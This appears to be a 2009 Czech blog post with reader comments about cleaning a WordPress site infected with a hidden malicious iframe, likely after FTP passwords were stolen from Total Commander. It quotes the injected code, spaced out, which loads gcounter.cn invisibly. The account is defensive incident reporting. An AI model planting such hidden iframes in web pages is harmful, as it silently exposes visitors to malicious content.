Hacklý wordpress (iframe)
Zář 7th, 2009 by Re4DeR
Psal mi týpek z xacrew.cz, že je na webu vir.
Koukám na to a iframe. Týpek používá (používal) total comander tak je to jasný. Začnu to opravovat.
- Nejdřív změny hesel.
- Manuální aktualizace wordpressu (přehrány všechny soubory) na nejnovější verzi.
- Zhlédnutí kódů šablony a odstranění javascriptu – tady jsem čekal, že to pomůže. Jenže ono ne.
Nějak jsem na nic nemohl přijít tak nakonec vypnu Noda a koukám na vygenerovaný kód. Tam je na konci příspěvku tento kód (bez mezer):
< i f r a m e s r c = h t t p : / / g c o u n t e r . c n s t y l e = d i s p l a y : n o n e > < / i f r a m e >
V šabloně nebyl. Kouknul jsem do administrace wordpressu a zde v ‘html modu’ je vložený.
Tak jsem ho smazal, ale nepochopil jsem kde se tam vzal. Rovnou do databáze nemohl, musel přes administrační rozhraní. Na netu jsem taky nic moc nenašel. Ještě se na to zítra kouknu.
Web by měl být v pořádku, požádal jsem google o přezkoumání bezpečnosti.
EDIT 8.9:
Stopbadware.org řekl, že web je ok-spolupracují s googlem. Docela rychlost. Čekal jsem, že to bude trvat dýl.
no, já naštěstí TC nepoužívám, četl sem, že si hesla neukládá nějak bezpečně…ty iframy jsou svině…
já taky ne. filezilla
Tak já jsem si to s tímhle to samozřejmě pěkně svého času „vyžrala“… :X Jak jinak než Total Commander a hesla hezky jako správnej lenoch uložený.
Co jsem tak četla, tak právě hesla od TC se ukládají do nějakého snadno čitelného souboru, snad dokonce ani ne nějak extra šifrovaného. Přiznám se, mám i Filezillu, ale TC tak nějak používám dál – zvyk je železná košile, jen ta hesla už tam tedy nemám. 
Já byla ale tak vyděšená z toho viru, že jsem tedy měnila hesla všude, protože tenkrát jsem nebyla schopná dohledat, co to způsobilo, no fujky, fujky. 
No to věřím. Mě se to naštěstí vyhlo.
Chvíli před tím než to začalo jsem reinstaloval systém a rovnou přešel na filezillu.
Takže jsem se s tím setkal až teď. Ale nechápu jak to dokázali vložit do databáze.
Ten kód byl v šabloně ale i v příspěvku a databázi.. :-/
Nevím, zda to už není další, „vylepšená vlna“. Pokud si vzpomínám, databázi mi to tehdy nezasáhlo, ale už je to zas pár měsíců zpátky.
Technicky to je ale docela složitý. I když wp-config.php
:D to by mohlo být ono